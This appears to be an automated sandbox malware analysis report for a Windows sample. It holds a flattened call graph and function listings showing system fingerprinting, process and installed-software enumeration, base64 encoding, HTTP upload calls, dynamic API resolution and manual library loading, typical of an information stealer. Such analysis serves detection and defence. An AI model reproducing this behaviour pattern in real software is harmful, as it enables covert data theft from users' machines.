15159->15160 15161 fb1c80 15160->15161 15162 fba8a0 lstrcpy 15161->15162 15163 fb1c89 15162->15163 15864 fb77c0 GetCurrentProcess IsWow64Process 15163->15864 15166 fba9b0 4 API calls 15167 fb1ca9 15166->15167 15168 fba8a0 lstrcpy 15167->15168 15169 fb1cb2 15168->15169 15170 fba9b0 4 API calls 15169->15170 15171 fb1cd1 15170->15171 15172 fba8a0 lstrcpy 15171->15172 15173 fb1cda 15172->15173 15174 fba9b0 4 API calls 15173->15174 15175 fb1cfb 15174->15175 15176 fba8a0 lstrcpy 15175->15176 15177 fb1d04 15176->15177 15178 fb7850 3 API calls 15177->15178 15179 fb1d14 15178->15179 15180 fba9b0 4 API calls 15179->15180 15181 fb1d24 15180->15181 15182 fba8a0 lstrcpy 15181->15182 15183 fb1d2d 15182->15183 15184 fba9b0 4 API calls 15183->15184 15185 fb1d4c 15184->15185 15186 fba8a0 lstrcpy 15185->15186 15187 fb1d55 15186->15187 15188 fba9b0 4 API calls 15187->15188 15189 fb1d75 15188->15189 15190 fba8a0 lstrcpy 15189->15190 15191 fb1d7e 15190->15191 15192 fb78e0 3 API calls 15191->15192 15193 fb1d8e 15192->15193 15194 fba9b0 4 API calls 15193->15194 15195 fb1d9e 15194->15195 15196 fba8a0 lstrcpy 15195->15196 15197 fb1da7 15196->15197 15198 fba9b0 4 API calls 15197->15198 15199 fb1dc6 15198->15199 15200 fba8a0 lstrcpy 15199->15200 15201 fb1dcf 15200->15201 15202 fba9b0 4 API calls 15201->15202 15203 fb1df0 15202->15203 15204 fba8a0 lstrcpy 15203->15204 15205 fb1df9 15204->15205 15866 fb7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15205->15866 15208 fba9b0 4 API calls 15209 fb1e19 15208->15209 15210 fba8a0 lstrcpy 15209->15210 15211 fb1e22 15210->15211 15212 fba9b0 4 API calls 15211->15212 15213 fb1e41 15212->15213 15214 fba8a0 lstrcpy 15213->15214 15215 fb1e4a 15214->15215 15216 fba9b0 4 API calls 15215->15216 15217 fb1e6b 15216->15217 15218 fba8a0 lstrcpy 15217->15218 15219 fb1e74 15218->15219 15868 fb7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15219->15868 15222 fba9b0 4 API calls 15223 fb1e94 15222->15223 15224 fba8a0 lstrcpy 15223->15224 15225 fb1e9d 15224->15225 15226 fba9b0 4 API calls 15225->15226 15227 fb1ebc 15226->15227 15228 fba8a0 lstrcpy 15227->15228 15229 fb1ec5 15228->15229 15230 fba9b0 4 API calls 15229->15230 15231 fb1ee5 15230->15231 15232 fba8a0 lstrcpy 15231->15232 15233 fb1eee 15232->15233 15871 fb7b00 GetUserDefaultLocaleName 15233->15871 15236 fba9b0 4 API calls 15237 fb1f0e 15236->15237 15238 fba8a0 lstrcpy 15237->15238 15239 fb1f17 15238->15239 15240 fba9b0 4 API calls 15239->15240 15241 fb1f36 15240->15241 15242 fba8a0 lstrcpy 15241->15242 15243 fb1f3f 15242->15243 15244 fba9b0 4 API calls 15243->15244 15245 fb1f60 15244->15245 15246 fba8a0 lstrcpy 15245->15246 15247 fb1f69 15246->15247 15875 fb7b90 15247->15875 15249 fb1f80 15250 fba920 3 API calls 15249->15250 15251 fb1f93 15250->15251 15252 fba8a0 lstrcpy 15251->15252 15253 fb1f9c 15252->15253 15254 fba9b0 4 API calls 15253->15254 15255 fb1fc6 15254->15255 15256 fba8a0 lstrcpy 15255->15256 15257 fb1fcf 15256->15257 15258 fba9b0 4 API calls 15257->15258 15259 fb1fef 15258->15259 15260 fba8a0 lstrcpy 15259->15260 15261 fb1ff8 15260->15261 15887 fb7d80 GetSystemPowerStatus 15261->15887 15264 fba9b0 4 API calls 15265 fb2018 15264->15265 15266 fba8a0 lstrcpy 15265->15266 15267 fb2021 15266->15267 15268 fba9b0 4 API calls 15267->15268 15269 fb2040 15268->15269 15270 fba8a0 lstrcpy 15269->15270 15271 fb2049 15270->15271 15272 fba9b0 4 API calls 15271->15272 15273 fb206a 15272->15273 15274 fba8a0 lstrcpy 15273->15274 15275 fb2073 15274->15275 15276 fb207e GetCurrentProcessId 15275->15276 15889 fb9470 OpenProcess 15276->15889 15279 fba920 3 API calls 15280 fb20a4 15279->15280 15281 fba8a0 lstrcpy 15280->15281 15282 fb20ad 15281->15282 15283 fba9b0 4 API calls 15282->15283 15284 fb20d7 15283->15284 15285 fba8a0 lstrcpy 15284->15285 15286 fb20e0 15285->15286 15287 fba9b0 4 API calls 15286->15287 15288 fb2100 15287->15288 15289 fba8a0 lstrcpy 15288->15289 15290 fb2109 15289->15290 15894 fb7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15290->15894 15293 fba9b0 4 API calls 15294 fb2129 15293->15294 15295 fba8a0 lstrcpy 15294->15295 15296 fb2132 15295->15296 15297 fba9b0 4 API calls 15296->15297 15298 fb2151 15297->15298 15299 fba8a0 lstrcpy 15298->15299 15300 fb215a 15299->15300 15301 fba9b0 4 API calls 15300->15301 15302 fb217b 15301->15302 15303 fba8a0 lstrcpy 15302->15303 15304 fb2184 15303->15304 15898 fb7f60 15304->15898 15307 fba9b0 4 API calls 15308 fb21a4 15307->15308 15309 fba8a0 lstrcpy 15308->15309 15310 fb21ad 15309->15310 15311 fba9b0 4 API calls 15310->15311 15312 fb21cc 15311->15312 15313 fba8a0 lstrcpy 15312->15313 15314 fb21d5 15313->15314 15315 fba9b0 4 API calls 15314->15315 15316 fb21f6 15315->15316 15317 fba8a0 lstrcpy 15316->15317 15318 fb21ff 15317->15318 15911 fb7ed0 GetSystemInfo wsprintfA 15318->15911 15321 fba9b0 4 API calls 15322 fb221f 15321->15322 15323 fba8a0 lstrcpy 15322->15323 15324 fb2228 15323->15324 15325 fba9b0 4 API calls 15324->15325 15326 fb2247 15325->15326 15327 fba8a0 lstrcpy 15326->15327 15328 fb2250 15327->15328 15329 fba9b0 4 API calls 15328->15329 15330 fb2270 15329->15330 15331 fba8a0 lstrcpy 15330->15331 15332 fb2279 15331->15332 15913 fb8100 GetProcessHeap RtlAllocateHeap 15332->15913 15335 fba9b0 4 API calls 15336 fb2299 15335->15336 15337 fba8a0 lstrcpy 15336->15337 15338 fb22a2 15337->15338 15339 fba9b0 4 API calls 15338->15339 15340 fb22c1 15339->15340 15341 fba8a0 lstrcpy 15340->15341 15342 fb22ca 15341->15342 15343 fba9b0 4 API calls 15342->15343 15344 fb22eb 15343->15344 15345 fba8a0 lstrcpy 15344->15345 15346 fb22f4 15345->15346 15919 fb87c0 15346->15919 15349 fba920 3 API calls 15350 fb231e 15349->15350 15351 fba8a0 lstrcpy 15350->15351 15352 fb2327 15351->15352 15353 fba9b0 4 API calls 15352->15353 15354 fb2351 15353->15354 15355 fba8a0 lstrcpy 15354->15355 15356 fb235a 15355->15356 15357 fba9b0 4 API calls 15356->15357 15358 fb237a 15357->15358 15359 fba8a0 lstrcpy 15358->15359 15360 fb2383 15359->15360 15361 fba9b0 4 API calls 15360->15361 15362 fb23a2 15361->15362 15363 fba8a0 lstrcpy 15362->15363 15364 fb23ab 15363->15364 15924 fb81f0 15364->15924 15366 fb23c2 15367 fba920 3 API calls 15366->15367 15368 fb23d5 15367->15368 15369 fba8a0 lstrcpy 15368->15369 15370 fb23de 15369->15370 15371 fba9b0 4 API calls 15370->15371 15372 fb240a 15371->15372 15373 fba8a0 lstrcpy 15372->15373 15374 fb2413 15373->15374 15375 fba9b0 4 API calls 15374->15375 15376 fb2432 15375->15376 15377 fba8a0 lstrcpy 15376->15377 15378 fb243b 15377->15378 15379 fba9b0 4 API calls 15378->15379 15380 fb245c 15379->15380 15381 fba8a0 lstrcpy 15380->15381 15382 fb2465 15381->15382 15383 fba9b0 4 API calls 15382->15383 15384 fb2484 15383->15384 15385 fba8a0 lstrcpy 15384->15385 15386 fb248d 15385->15386 15387 fba9b0 4 API calls 15386->15387 15388 fb24ae 15387->15388 15389 fba8a0 lstrcpy 15388->15389 15390 fb24b7 15389->15390 15932 fb8320 15390->15932 15392 fb24d3 15393 fba920 3 API calls 15392->15393 15394 fb24e6 15393->15394 15395 fba8a0 lstrcpy 15394->15395 15396 fb24ef 15395->15396 15397 fba9b0 4 API calls 15396->15397 15398 fb2519 15397->15398 15399 fba8a0 lstrcpy 15398->15399 15400 fb2522 15399->15400 15401 fba9b0 4 API calls 15400->15401 15402 fb2543 15401->15402 15403 fba8a0 lstrcpy 15402->15403 15404 fb254c 15403->15404 15405 fb8320 17 API calls 15404->15405 15406 fb2568 15405->15406 15407 fba920 3 API calls 15406->15407 15408 fb257b 15407->15408 15409 fba8a0 lstrcpy 15408->15409 15410 fb2584 15409->15410 15411 fba9b0 4 API calls 15410->15411 15412 fb25ae 15411->15412 15413 fba8a0 lstrcpy 15412->15413 15414 fb25b7 15413->15414 15415 fba9b0 4 API calls 15414->15415 15416 fb25d6 15415->15416 15417 fba8a0 lstrcpy 15416->15417 15418 fb25df 15417->15418 15419 fba9b0 4 API calls 15418->15419 15420 fb2600 15419->15420 15421 fba8a0 lstrcpy 15420->15421 15422 fb2609 15421->15422 15968 fb8680 15422->15968 15424 fb2620 15425 fba920 3 API calls 15424->15425 15426 fb2633 15425->15426 15427 fba8a0 lstrcpy 15426->15427 15428 fb263c 15427->15428 15429 fb265a lstrlen 15428->15429 15430 fb266a 15429->15430 15431 fba740 lstrcpy 15430->15431 15432 fb267c 15431->15432 15433 fa1590 lstrcpy 15432->15433 15434 fb268d 15433->15434 15978 fb5190 15434->15978 15436 fb2699 15436->13868 16166 fbaad0 15437->16166 15439 fa5009 InternetOpenUrlA 15440 fa5021 15439->15440 15441 fa502a InternetReadFile 15440->15441 15442 fa50a0 InternetCloseHandle InternetCloseHandle 15440->15442 15441->15440 15443 fa50ec 15442->15443 15443->13872 16167 fa98d0 15444->16167 15446 fb0759 15447 fb0a38 15446->15447 15448 fb077d 15446->15448 15449 fa1590 lstrcpy 15447->15449 15451 fb0799 StrCmpCA 15448->15451 15450 fb0a49 15449->15450 16343 fb0250 15450->16343 15453 fb07a8 15451->15453 15454 fb0843 15451->15454 15455 fba7a0 lstrcpy 15453->15455 15458 fb0865 StrCmpCA 15454->15458 15456 fb07c3 15455->15456 15459 fa1590 lstrcpy 15456->15459 15460 fb0874 15458->15460 15496 fb096b 15458->15496 15461 fb080c 15459->15461 15462 fba740 lstrcpy 15460->15462 15463 fba7a0 lstrcpy 15461->15463 15465 fb0881 15462->15465 15466 fb0823 15463->15466 15464 fb099c StrCmpCA 15467 fb09ab 15464->15467 15468 fb0a2d 15464->15468 15469 fba9b0 4 API calls 15465->15469 15471 fba7a0 lstrcpy 15466->15471 15472 fa1590 lstrcpy 15467->15472 15468->13876 15470 fb08ac 15469->15470 15473 fba920 3 API calls 15470->15473 15474 fb083e 15471->15474 15475 fb09f4 15472->15475 15477 fb08b3 15473->15477 16170 fafb00 15474->16170 15476 fba7a0 lstrcpy 15475->15476 15479 fb0a0d 15476->15479 15480 fba9b0 4 API calls 15477->15480 15481 fba7a0 lstrcpy 15479->15481 15482 fb08ba 15480->15482 15483 fb0a28 15481->15483 15484 fba8a0 lstrcpy 15482->15484 16286 fb0030 15483->16286 15496->15464 15818 fba7a0 lstrcpy 15817->15818 15819 fa1683 15818->15819 15820 fba7a0 lstrcpy 15819->15820 15821 fa1695 15820->15821 15822 fba7a0 lstrcpy 15821->15822 15823 fa16a7 15822->15823 15824 fba7a0 lstrcpy 15823->15824 15825 fa15a3 15824->15825 15825->14699 15827 fa47c6 15826->15827 15828 fa4838 lstrlen 15827->15828 15852 fbaad0 15828->15852 15830 fa4848 InternetCrackUrlA 15831 fa4867 15830->15831 15831->14776 15833 fba740 lstrcpy 15832->15833 15834 fb8b74 15833->15834 15835 fba740 lstrcpy 15834->15835 15836 fb8b82 GetSystemTime 15835->15836 15838 fb8b99 15836->15838 15837 fba7a0 lstrcpy 15839 fb8bfc 15837->15839 15838->15837 15839->14791 15841 fba931 15840->15841 15842 fba988 15841->15842 15844 fba968 lstrcpy lstrcat 15841->15844 15843 fba7a0 lstrcpy 15842->15843 15845 fba994 15843->15845 15844->15842 15845->14795 15846->14909 15848 fa4eee 15847->15848 15849 fa9af9 LocalAlloc 15847->15849 15848->14797 15848->14800 15849->15848 15850 fa9b14 CryptStringToBinaryA 15849->15850 15850->15848 15851 fa9b39 LocalFree 15850->15851 15851->15848 15852->15830 15853->14919 15854->15060 15855->15062 15856->15070 15985 fb77a0 15857->15985 15860 fb1c1e 15860->15152 15861 fb76c6 RegOpenKeyExA 15862 fb76e7 RegQueryValueExA 15861->15862 15863 fb7704 RegCloseKey 15861->15863 15862->15863 15863->15860 15865 fb1c99 15864->15865 15865->15166 15867 fb1e09 15866->15867 15867->15208 15869 fb7a9a wsprintfA 15868->15869 15870 fb1e84 15868->15870 15869->15870 15870->15222 15872 fb7b4d 15871->15872 15873 fb1efe 15871->15873 15992 fb8d20 LocalAlloc CharToOemW 15872->15992 15873->15236 15876 fba740 lstrcpy 15875->15876 15877 fb7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15876->15877 15886 fb7c25 15877->15886 15878 fb7d18 15880 fb7d28 15878->15880 15881 fb7d1e LocalFree 15878->15881 15879 fb7c46 GetLocaleInfoA 15879->15886 15882 fba7a0 lstrcpy 15880->15882 15881->15880 15885 fb7d37 15882->15885 15883 fba9b0 lstrcpy lstrlen lstrcpy lstrcat 15883->15886 15884 fba8a0 lstrcpy 15884->15886 15885->15249 15886->15878 15886->15879 15886->15883 15886->15884 15888 fb2008 15887->15888 15888->15264 15890 fb9493 GetModuleFileNameExA CloseHandle 15889->15890 15891 fb94b5 15889->15891 15890->15891 15892 fba740 lstrcpy 15891->15892 15893 fb2091 15892->15893 15893->15279 15895 fb7e68 RegQueryValueExA 15894->15895 15897 fb2119 15894->15897 15896 fb7e8e RegCloseKey 15895->15896 15896->15897 15897->15293 15899 fb7fb9 GetLogicalProcessorInformationEx 15898->15899 15900 fb7fd8 GetLastError 15899->15900 15907 fb8029 15899->15907 15903 fb8022 15900->15903 15910 fb7fe3 15900->15910 15904 fb2194 15903->15904 15906 fb89f0 2 API calls 15903->15906 15904->15307 15905 fb89f0 2 API calls 15908 fb807b 15905->15908 15906->15904 15907->15905 15908->15903 15909 fb8084 wsprintfA 15908->15909 15909->15904 15910->15899 15910->15904 15993 fb89f0 15910->15993 15996 fb8a10 GetProcessHeap RtlAllocateHeap 15910->15996 15912 fb220f 15911->15912 15912->15321 15914 fb89b0 15913->15914 15915 fb814d GlobalMemoryStatusEx 15914->15915 15916 fb8163 15915->15916 15917 fb819b wsprintfA 15916->15917 15918 fb2289 15917->15918 15918->15335 15920 fb87fb GetProcessHeap RtlAllocateHeap wsprintfA 15919->15920 15922 fba740 lstrcpy 15920->15922 15923 fb230b 15922->15923 15923->15349 15925 fba740 lstrcpy 15924->15925 15931 fb8229 15925->15931 15926 fb8263 15927 fba7a0 lstrcpy 15926->15927 15929 fb82dc 15927->15929 15928 fba9b0 lstrcpy lstrlen lstrcpy lstrcat 15928->15931 15929->15366 15930 fba8a0 lstrcpy 15930->15931 15931->15926 15931->15928 15931->15930 15933 fba740 lstrcpy 15932->15933 15934 fb835c RegOpenKeyExA 15933->15934 15935 fb83ae 15934->15935 15936 fb83d0 15934->15936 15937 fba7a0 lstrcpy 15935->15937 15938 fb83f8 RegEnumKeyExA 15936->15938 15939 fb8613 RegCloseKey 15936->15939 15948 fb83bd 15937->15948 15940 fb843f wsprintfA RegOpenKeyExA 15938->15940 15941 fb860e 15938->15941 15942 fba7a0 lstrcpy 15939->15942 15943 fb84c1 RegQueryValueExA 15940->15943 15944 fb8485 RegCloseKey RegCloseKey 15940->15944 15941->15939 15942->15948 15946 fb84fa lstrlen 15943->15946 15947 fb8601 RegCloseKey 15943->15947 15945 fba7a0 lstrcpy 15944->15945 15945->15948 15946->15947 15949 fb8510 15946->15949 15947->15941 15948->15392 15950 fba9b0 4 API calls 15949->15950 15951 fb8527 15950->15951 15952 fba8a0 lstrcpy 15951->15952 15953 fb8533 15952->15953 15954 fba9b0 4 API calls 15953->15954 15955 fb8557 15954->15955 15956 fba8a0 lstrcpy 15955->15956 15957 fb8563 15956->15957 15958 fb856e RegQueryValueExA 15957->15958 15958->15947 15959 fb85a3 15958->15959 15960 fba9b0 4 API calls 15959->15960 15961 fb85ba 15960->15961 15962 fba8a0 lstrcpy 15961->15962 15963 fb85c6 15962->15963 15964 fba9b0 4 API calls 15963->15964 15965 fb85ea 15964->15965 15966 fba8a0 lstrcpy 15965->15966 15967 fb85f6 15966->15967 15967->15947 15969 fba740 lstrcpy 15968->15969 15970 fb86bc CreateToolhelp32Snapshot Process32First 15969->15970 15971 fb86e8 Process32Next 15970->15971 15972 fb875d CloseHandle 15970->15972 15971->15972 15977 fb86fd 15971->15977 15973 fba7a0 lstrcpy 15972->15973 15975 fb8776 15973->15975 15974 fba9b0 lstrcpy lstrlen lstrcpy lstrcat 15974->15977 15975->15424 15976 fba8a0 lstrcpy 15976->15977 15977->15971 15977->15974 15977->15976 15979 fba7a0 lstrcpy 15978->15979 15980 fb51b5 15979->15980 15981 fa1590 lstrcpy 15980->15981 15982 fb51c6 15981->15982 15997 fa5100 15982->15997 15984 fb51cf 15984->15436 15988 fb7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15985->15988 15987 fb76b9 15987->15860 15987->15861 15989 fb7780 RegCloseKey 15988->15989 15990 fb7765 RegQueryValueExA 15988->15990 15991 fb7793 15989->15991 15990->15989 15991->15987 15992->15873 15994 fb89f9 GetProcessHeap HeapFree 15993->15994 15995 fb8a0c 15993->15995 15994->15995 15995->15910 15996->15910 15998 fba7a0 lstrcpy 15997->15998 15999 fa5119 15998->15999 16000 fa47b0 2 API calls 15999->16000 16001 fa5125 16000->16001 16157 fb8ea0 16001->16157 16003 fa5184 16004 fa5192 lstrlen 16003->16004 16005 fa51a5 16004->16005 16006 fb8ea0 4 API calls 16005->16006 16007 fa51b6 16006->16007 16008 fba740 lstrcpy 16007->16008 16009 fa51c9 16008->16009 16010 fba740 lstrcpy 16009->16010 16011 fa51d6 16010->16011 16012 fba740 lstrcpy 16011->16012 16013 fa51e3 16012->16013 16014 fba740 lstrcpy 16013->16014 16015 fa51f0 16014->16015 16016 fba740 lstrcpy 16015->16016 16017 fa51fd InternetOpenA StrCmpCA 16016->16017 16018 fa522f 16017->16018 16019 fa58c4 InternetCloseHandle 16018->16019 16020 fb8b60 3 API calls 16018->16020 16026 fa58d9 ctype 16019->16026 16021 fa524e 16020->16021 16022 fba920 3 API calls 16021->16022 16023 fa5261 16022->16023 16024 fba8a0 lstrcpy 16023->16024 16025 fa526a 16024->16025 16027 fba9b0 4 API calls 16025->16027 16029 fba7a0 lstrcpy 16026->16029 16028 fa52ab 16027->16028 16030 fba920 3 API calls 16028->16030 16038 fa5913 16029->16038 16031 fa52b2 16030->16031 16032 fba9b0 4 API calls 16031->16032 16033 fa52b9 16032->16033 16034 fba8a0 lstrcpy 16033->16034 16035 fa52c2 16034->16035 16036 fba9b0 4 API calls 16035->16036 16037 fa5303 16036->16037 16039 fba920 3 API calls 16037->16039 16038->15984 16040 fa530a 16039->16040 16041 fba8a0 lstrcpy 16040->16041 16042 fa5313 16041->16042 16043 fa5329 InternetConnectA 16042->16043 16043->16019 16044 fa5359 HttpOpenRequestA 16043->16044 16046 fa58b7 InternetCloseHandle 16044->16046 16047 fa53b7 16044->16047 16046->16019 16048 fba9b0 4 API calls 16047->16048 16049 fa53cb 16048->16049 16050 fba8a0 lstrcpy 16049->16050 16051 fa53d4 16050->16051 16052 fba920 3 API calls 16051->16052 16053 fa53f2 16052->16053 16054 fba8a0 lstrcpy 16053->16054 16055 fa53fb 16054->16055 16056 fba9b0 4 API calls 16055->16056 16057 fa541a 16056->16057 16058 fba8a0 lstrcpy 16057->16058 16059 fa5423 16058->16059 16060 fba9b0 4 API calls 16059->16060 16061 fa5444 16060->16061 16062 fba8a0 lstrcpy 16061->16062 16063 fa544d 16062->16063 16064 fba9b0 4 API calls 16063->16064 16065 fa546e 16064->16065 16066 fba8a0 lstrcpy 16065->16066 16158 fb8ea9 16157->16158 16159 fb8ead CryptBinaryToStringA 16157->16159 16158->16003 16159->16158 16160 fb8ece GetProcessHeap RtlAllocateHeap 16159->16160 16160->16158 16161 fb8ef4 ctype 16160->16161 16162 fb8f05 CryptBinaryToStringA 16161->16162 16162->16158 16166->15439 16409 fa9880 16167->16409 16169 fa98e1 16169->15446 16171 fba740 lstrcpy 16170->16171 16172 fafb16 16171->16172 16344 fba740 lstrcpy 16343->16344 16345 fb0266 16344->16345 16346 fb8de0 2 API calls 16345->16346 16347 fb027b 16346->16347 16348 fba920 3 API calls 16347->16348 16349 fb028b 16348->16349 16350 fba8a0 lstrcpy 16349->16350 16351 fb0294 16350->16351 16352 fba9b0 4 API calls 16351->16352 16353 fb02b8 16352->16353 16354 fba8a0 lstrcpy 16353->16354 16410 fa988e 16409->16410 16413 fa6fb0 16410->16413 16412 fa98ad ctype 16412->16169 16416 fa6d40 16413->16416 16417 fa6d63 16416->16417 16429 fa6d59 16416->16429 16417->16429 16430 fa6660 16417->16430 16419 fa6dbe 16419->16429 16436 fa69b0 16419->16436 16421 fa6e2a 16422 fa6ee6 VirtualFree 16421->16422 16424 fa6ef7 16421->16424 16421->16429 16422->16424 16423 fa6f41 16427 fb89f0 2 API calls 16423->16427 16423->16429 16424->16423 16425 fa6f38 16424->16425 16426 fa6f26 FreeLibrary 16424->16426 16428 fb89f0 2 API calls 16425->16428 16426->16424 16427->16429 16428->16423 16429->16412 16435 fa668f VirtualAlloc 16430->16435 16432 fa6730 16433 fa673c 16432->16433 16434 fa6743 VirtualAlloc 16432->16434 16433->16419 16434->16433 16435->16432 16435->16433 16437 fa69c9 16436->16437 16440 fa69d5 16436->16440 16438 fa6a09 LoadLibraryA 16437->16438 16437->16440 16439 fa6a32 16438->16439 16438->16440 16443 fa6ae0 16439->16443 16446 fb8a10 GetProcessHeap RtlAllocateHeap 16439->16446 16440->16421 16442 fa6ba8 GetProcAddress 16442->16440 16442->16443 16443->16440 16443->16442 16444 fb89f0 2 API calls 16444->16443 16445 fa6a8b 16445->16440 16445->16444 16446->16445

                                    Executed Functions

                                    Function 00FB9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 660 fb9860-fb9874 call fb9750 663 fb987a-fb9a8e call fb9780 GetProcAddress * 21 660->663 664 fb9a93-fb9af2 LoadLibraryA * 5 660->664 663->664 666 fb9b0d-fb9b14 664->666 667 fb9af4-fb9b08 GetProcAddress 664->667 668 fb9b46-fb9b4d 666->668 669 fb9b16-fb9b41 GetProcAddress * 2 666->669 667->666 671 fb9b68-fb9b6f 668->671 672 fb9b4f-fb9b63 GetProcAddress 668->672 669->668 673 fb9b89-fb9b90 671->673 674 fb9b71-fb9b84 GetProcAddress 671->674 672->671 675 fb9b92-fb9bbc GetProcAddress * 2 673->675 676 fb9bc1-fb9bc2 673->676 674->673 675->676
                                    APIs
                                    • GetProcAddress.KERNEL32(74DD0000,008C2170), ref: 00FB98A1
                                    • GetProcAddress.KERNEL32(74DD0000,008C2320), ref: 00FB98BA
                                    • GetProcAddress.KERNEL32(74DD0000,008C22D8), ref: 00FB98D2
                                    • GetProcAddress.KERNEL32(74DD0000,008C22F0), ref: 00FB98EA
                                    • GetProcAddress.KERNEL32(74DD0000,008C2428), ref: 00FB9903
                                    • GetProcAddress.KERNEL32(74DD0000,008C91B0), ref: 00FB991B
                                    • GetProcAddress.KERNEL32(74DD0000,008B5430), ref: 00FB9933
                                    • GetProcAddress.KERNEL32(74DD0000,008B52B0), ref: 00FB994C
                                    • GetProcAddress.KERNEL32(74DD0000,008C2458), ref: 00FB9964
                                    • GetProcAddress.KERNEL32(74DD0000,008C23F8), ref: 00FB997C
                                    • GetProcAddress.KERNEL32(74DD0000,008C21A0), ref: 00FB9995
                                    • GetProcAddress.KERNEL32(74DD0000,008C21B8), ref: 00FB99AD
                                    • GetProcAddress.KERNEL32(74DD0000,008B5450), ref: 00FB99C5
                                    • GetProcAddress.KERNEL32(74DD0000,008C21E8), ref: 00FB99DE
                                    • GetProcAddress.KERNEL32(74DD0000,008C2200), ref: 00FB99F6
                                    • GetProcAddress.KERNEL32(74DD0000,008B53D0), ref: 00FB9A0E
                                    • GetProcAddress.KERNEL32(74DD0000,008C2218), ref: 00FB9A27
                                    • GetProcAddress.KERNEL32(74DD0000,008C2230), ref: 00FB9A3F
                                    • GetProcAddress.KERNEL32(74DD0000,008B5230), ref: 00FB9A57
                                    • GetProcAddress.KERNEL32(74DD0000,008C2248), ref: 00FB9A70
                                    • GetProcAddress.KERNEL32(74DD0000,008B5470), ref: 00FB9A88
                                    • LoadLibraryA.KERNEL32(008C24D0,?,00FB6A00), ref: 00FB9A9A
                                    • LoadLibraryA.KERNEL32(008C24A0,?,00FB6A00), ref: 00FB9AAB
                                    • LoadLibraryA.KERNEL32(008C24E8,?,00FB6A00), ref: 00FB9ABD
                                    • LoadLibraryA.KERNEL32(008C2500,?,00FB6A00), ref: 00FB9ACF
                                    • LoadLibraryA.KERNEL32(008C2530,?,00FB6A00), ref: 00FB9AE0
                                    • GetProcAddress.KERNEL32(75A70000,008C24B8), ref: 00FB9B02
                                    • GetProcAddress.KERNEL32(75290000,008C2470), ref: 00FB9B23
                                    • GetProcAddress.KERNEL32(75290000,008C2488), ref: 00FB9B3B
                                    • GetProcAddress.KERNEL32(75BD0000,008C2518), ref: 00FB9B5D
                                    • GetProcAddress.KERNEL32(75450000,008B5490), ref: 00FB9B7E
                                    • GetProcAddress.KERNEL32(76E90000,008C9120), ref: 00FB9B9F
                                    • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00FB9BB6
                                    Strings
                                    • NtQueryInformationProcess, xrefs: 00FB9BAA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1746921338.0000000000FA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                    • Associated: 00000000.00000002.1746901409.0000000000FA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001051000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.000000000105D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.0000000001082000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1746921338.00000000011EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000011FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001390000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001470000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.0000000001493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.000000000149C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747120792.00000000014AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747457383.00000000014AB000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747581886.0000000001650000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1747599841.0000000001651000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fa0000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: NtQueryInformationProcess
                                    • API String ID: 2238633743-2781105232
                                    • Opcode ID: c403630ce8ce39d0dba88153808d41b8dd18454ea0c14f14fe725acd8be8f4dc
                                    • Instruction ID: 38bb1b399e0d2bc6da2023e7bf271eef2e7c1e333bcc503738c78ff5ff5f36cc
                                    • Opcode Fuzzy Hash: c403630ce8ce39d0dba88153808d41b8dd18454ea0c14f14fe725acd8be8f4dc
                                    • Instruction Fuzzy Hash: F4A12DB99406409FD37CEFE8F5889563BF9FF8C302705853AA6268B24CD63A94C1DB50
                                    Function 00FA45C0 Relevance: 56.1, APIs: 2, Strings: 30, Instructions: 148memoryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 764 fa45c0-fa4695 RtlAllocateHeap 781 fa46a0-fa46a6 764->781 782 fa474f-fa47a9 VirtualProtect 781->782 783 fa46ac-fa474a 781->783 783->781
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00FA460F
                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00FA479C
                                    Strings
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA4729
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA46CD
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA473F
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00FA4638
